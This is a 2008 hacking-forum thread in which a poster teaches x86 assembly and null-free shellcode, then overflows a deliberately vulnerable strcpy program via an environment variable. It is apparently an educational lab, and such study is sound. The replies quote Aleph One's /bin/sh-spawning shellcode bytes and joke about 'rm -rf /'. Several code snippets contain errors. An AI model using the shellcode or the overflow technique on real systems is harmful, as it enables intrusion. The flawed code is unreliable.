Board

Go Back   Board > Computers, Hacking, and Files > Hacking and Phreaking
Register FAQ Members List Calendar Search Today's Posts Mark Forums Read

Hacking and Phreaking From hacking a website to a new virus or getting free calls on a phone. It goes here.

Reply
 
Thread Tools Display Modes
  #1  
Old 02-11-2008, 12:14 PM
Twitch Twitch is offline
Valued Member
 
Join Date: Oct 2005
Location: Ireland!
Posts: 475
Twitch is an unknown quantity at this point
Default Tutorial: The path to shellcode

Here's a tutorial that I put together to try and encourage people to start into assembly and exploitation.. If there are any errors, please post here and I'll edit them ASAP.

The path to shellcode
=====================
In this tutorial, I will teach you the basics of assembly needed to
build your own shellcode.
Assembly is quite a misunderstood language, and people always believe that its harder than it actually is! Heres a little overview of what
assembly really does though:
Assembly is programing a machine in the lowest level (No compiilers, etc) possible without going into the 0's and 1's. It's all about thinking about how you arrange your memory, etc. It's quite easy to do really.

The object of the tutorial will be to exploit the following program.
Code:
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

int main(int argc, char *argv[]){
  char buffer[5]
  if(argc<2){
    printf("Usage: %s <text>\n",%s);
    exit(0);
  }
  strcpy(buffer,argv[1]);
  printf("%s\n",buffer);
  return 0;
}
To compile it, run the following:
$ gcc -g bug.c bug
$ ./bug Bob.
Bob.
$

This will compile and test the program. The part that makes is program exploitable is the strcpy() function. It does not check the arguments to see if their lengths are appropriate. In this tutorial, we will be making use of this fact, and will be building
a big string in the argv[1], and it will be copied into the tiny (5 bytes) character array.

In this tutorial we will be covering the intel assembly syntax, and using nasm. There are different types, eg AT&T, and all can be used for shellcode, but what you choose to learn is all down to taste.
The basic syntax for an assembly instruction is the following:
Code:
	instruction argument(, argument)
The second is optional in some cases. Now it's time to learn some of the opcodes!

Code:
	mov	- Takes who arguments. The second is the source, the first is the destination. It moves the memory address of the second into the first, essentially copying the data.
	inc	- This just takes one. It takes the arguments value (or address, etc) and increases its value by one. It stores the result in the source address. 
	dec	- This is the same as inc, but decreases the arguments value.
	push	- This is a stack function. There is only one argument, the source. It is used to 'push' the sources data onto the stack.
	pop	- This is another stack function, and is used to 'pop' something 
off the stack into the location of the first (only) argument.
	call	- This will call a funcion, jumping the execution to the address 
supplied as an argument. 
	ret	- To return from a function. It pops the return address from the 
stack, and jumps execution to there.
	xor	- This takes two arguments. It is used to preform a bitwise 
exclusing 'or', comparing each operand.
	int	- This will be the instruction that puts all of this together. 
It stands for interrupt. It takes one argument, and that is the interrupt number that will call different parts of the system. In this example, we will be using 'int 80h', as it is the interrupt that calls the kernel to execute our code.

Here is an example demonstrating the syntax of assembly.

example.s
Code:
mov eax,4			; move '4' into eax.
inc eax			; increase eax by one, i.e., to 5.
call randomFunction	; call the function random function.
push eax			; push eax's value onto the stack.
pop edx			; pop the value off the top of the stack into EDX.
xor eax,edx			; xor the values of eax and edx. This will return 0, as both values are the same.
Compiling this program will be useless, but it gets the general layout into your head.
Now, it's time to take our second step into learning assembly, and write a program.

Hello World!
This program, being our first, will follow a traditional pattern, it's going to do nothing but print "Hello, world!". So, how do we go about doing this? Well, in the linux kernel, there is an array of system calls that correspond to functions.
We need to copy the appropriate number for a call to write to STDOUT (standard output, i.e., your console window).
The next question is where? In assembly, there are a number of registers that need to be filled in in order for a program to run.
The first four are EAX, EBX, ECX, and EDX. These are called the accumulator, base, counter, and data registers. They are used for a wide range of things, but mainly they are temporary variables that are used when executing machine instructions.

The next four are ESP, EBP, ESI, and EDI. They are also general purpose registers, but are sometimes called pointers and indexes. They are the Stack Pointer, Base Pointer, Source Index, and Destination Index, respectively. The first two are reffered to as pointers because they contain 32-bit memory addresses, pointing to a location in the memory.
The last two are also technically pointers, that are used to point to the source and destination when data needs to be read from or written to.
The last is the EIP register, which points to the current instruction the CPU is executing. It is akin to a child pointing at a word as it reads.

In this tutorial, we will only need EAX, EBX, ECX, and EDX, but it can be helpful in assembly to understand the others. The EAX register holds the integer value for the system call we want to use. The rest will hold the arguments.

Now, just before we write our program, we need to look at segments in memory. The ones we will be using in the following example are .data and the .text. The .data segment stores the variables, and .text holds the machine code.
And now, some machine code!


hello.s
Code:
section .data					; Note, we called the .data segment for 
variables.
	msg db "Hello, world!", 0ah		; This writes our string and a new line 
character into 'msg'.

section .text					; now in the text segment.
	global _start				; this is the default entry point for 
ELF linking and tells the CPU where to begin executing from.

_start:						; have a function called start. This is 
because of the linking; the linker needs to know where to begin.

; SYSCALL 4: write(int fd, const void *buffer, size_t count);
	mov eax,4				; the 4th syscall is for write. This is 
what we will use to write to the STDOUT file descriptor.
	mov ebx,1				; put 1 into EBX. This is the file 
descriptor for STOUT.
	mov ecx,msg				; put 'msg' into ecx.	
	mov edx,14				; put the length of the string and 
newline char into edx. 
	int 80h					; call the kernel to run the above!

; SYSCALL 1: exit(0)	
	mov eax,1				; put exit's syscall number into eax.	
	mov ebx,0				; return 0 upon exit.	
	int 80h
And that's it! It looks a little daunting at first, but it's all very structured and simple, and thats what I really like about assembly. Now, we will assemble and link our code!

twitch@home:~ $ nasm -f elf hello.s
twitch@home:~ $ ld hello.o
twitch@home:~ $ ./a.out
Hello, world!
twitch$home:~ $

So, our program worked. I'd recommend taking out all the comments from the above code and looking at it then, it's a lot cleaner.

Unfortunately, our code will not work as shellcode however.
The problems
are as follows:
- Shellcode itself is inside a .text segments, so we cannot be
moving within the shellcode.
- We also cannot have null bytes!
To check for null bytes, we assembly the program in a different way.

==========
twitch@home:~ $ nasm hello.s
twitch@home:~ $ hexdump -C hello | grep --color=auto 00
[ OUTPUT TRIMMED ]
==========

This will show us a lot of null bytes within the code. We will have to
remove these, but lets rewrite our code in a shellcode-suitable form.

hello2.s
Code:
BITS 32

call mark_below

db "Hello, World!",0x0a,0x0d

mark_below:
; ssize_t write(int fd, const void *buf, size_t count);
pop ecx	 					;pop the return address (the string pointer) into ecx
mov eax,4						; 4 is the syscall for write.
mov ebx,1	; STDOUT
mov edx,15						; length of string
int 80h						; do the system call

; void _exit(int status)
mov eax,1						; 1 is exits system call
mov ebx,0						; return 0;
int 80h						; do the system call
Now, run the following to assemble and check our code.

$ nasm hello2.s
$ hexdump -C hello2 | grep --color=auto 00

There are still plenty of null bytes in our code, and it can be tested out but it will not work as shellcode. In the output from hexdump, you will see 6 00's near the start. This (using gdb) can be shown to be our call function.. We need to sort that out. Here is our modified code.

hello3.s
Code:
BITS 32

jmp short one					; call the 'one' function, which will call next.

two: 
; ssize_t write(int fd, const void *buf, size_t count);
pop ecx						; pop the string pointer from the stack
mov al,4						; put 4 into AL
xor ebx,ebx						; XORing ebx with itself will return 0.
inc ebx						; increase ebx by one
xor edx,edx						; XOR out edx
mov dl,15						; put 16 into edx
int 80h						; call the kernel

mov al,1						; put 1 into AL for exit
dec ebx						; decrease ebx to 0 (return code)
int 80h						; call the kernel.

one:	
call two
db "Hello, world!", 0x0a, 0x0d,0x00
This is shellcode that can actually be used! Assembly and check it to be
sure:

$ nasm hello3.s
$ hexdump -C hello3 | grep --color=auto 00

Look! No NULL bytes! Excellent, this will do very nicely. But, why did it work? Our shellcode now is quite different from before, but it should be readable to you. It encorperates most of the instructions in the initial example!
The only thing that ought to be confusing you is the 'mov al,4' line. What is AL? Well, years back, computers used to only have 16-bit registers. That meant, there was AX as the whole accumulator register, with AL as the lower 8 bytes, and AH as the higher 8 bytes.
Now, with 32-bit processors, we have EAX. We can use the AX register nowadays if we choose. The REASON for using it, is because the AL register can hold the integer '4', so we use that to avoid the null bytes that are brought in when we use EAX.

Now, it's time to exploit our program!

Running the exploit
Now that we have our shellcode sorted out, we need to find somewhere to
hold it. To make use of a good trick, we will use environment
variables.
These are useful when the buffer we are overflowing is small. We can
overflow the buffer with the address of the environment variable with the shellcode in it. Here is a program that will tell us the location of an environment variable in memory:
getenvaddr.c
Code:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[]){
  char *ptr;
  if(argc < 3){
    printf("Usage: %s <environment variable> <target program>\n",argv[0]);
    exit(0);
  }
  ptr = getenv(argv[1]);
  ptr += (strlen(argv[0]) - strlen(strlen(argv[2]))*2;
  printf("%s will be at %p\n",argv[1],ptr);
}
We will now compile the above program, and then load the the shellcode into memory. Then, we will find the memory address, and use perl to print
the memory address out a few times.

$ nasm hello3.s
$ export SHELLCODE=`cat hello3`
$ ./getenvaddr SHELLCODE ./bug
SHELLCODE will be at 0xbfffff0c
$ ./bug `perl -e 'print "\x0c\xff\xff\xbf"x100;'`
Hello, World!
$
__________________
Twitch`
Reply With Quote
  #2  
Old 02-11-2008, 01:38 PM
s25's Avatar
s25 s25 is offline
Administrator
Trusted Member
 
Join Date: Dec 2005
Posts: 609
s25 is on a distinguished road
Default Re: Tutorial: The path to shellcode

Very good! Could you define shell code as I always thought of it as #!/bin/bash
rm -rf /

Or some such thing!
__________________
New Public Keys:
http://a0tu.com/content/yep-just-gen...-some-new-keys

Reply With Quote
  #3  
Old 02-11-2008, 04:37 PM
Twitch Twitch is offline
Valued Member
 
Join Date: Oct 2005
Location: Ireland!
Posts: 475
Twitch is an unknown quantity at this point
Default Re: Tutorial: The path to shellcode

Yeah no bother!
It's basically hex code that isn't dependent on file/process in the OS. It's code that will run without including other files,etc. Typically its use is in the exploitation of programs. It got the name because usually when exploiting a vulnerability, the purpose of the code would be to spawn a shell, so "shellcode" followed as a name.

Here's an example from AlephOne's "smashing the stack for fun and profit".
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\ x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\ x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";

When you compile the C or assembly shellcode, it's being written into a hex format that the machine will understand. For example,
(1) mov eax,4 will be compiled into "b8 04 00 00 00"
(2) mov al,4 will be compiled into "b0 04"

But when you're injecting the code, it'll presume it's just plain ASCII, so you need the \x prefix to tell the machine its hexadecimal. So, mov al,4 will be compiled into "b0 04" and when we write it as shellcode, it's "\xb0\x04".
__________________
Twitch`
Reply With Quote
Reply

Bookmarks

Tags
assembly , exploitation , hacking , programming , tutorial


Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)
 
Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Forum Jump

Similar Threads
Thread Thread Starter Forum Replies Last Post
Tutorial Cannons and Weapons 19 11-07-2007 07:50 PM
Brilliant C tutorial Jamkirk Websites and Files 4 22-01-2007 06:30 PM
My tutorial (proofread please) 4 Hacking and Phreaking 2 20-06-2005 03:43 PM
A little tutorial on key generators General Disscusion 0 30-12-2004 08:00 PM
raZZia's Tutorial on Key Generators General Disscusion 0 30-12-2004 12:57 AM


All times are GMT +1. The time now is 12:14 AM.


Copyright a0tu.com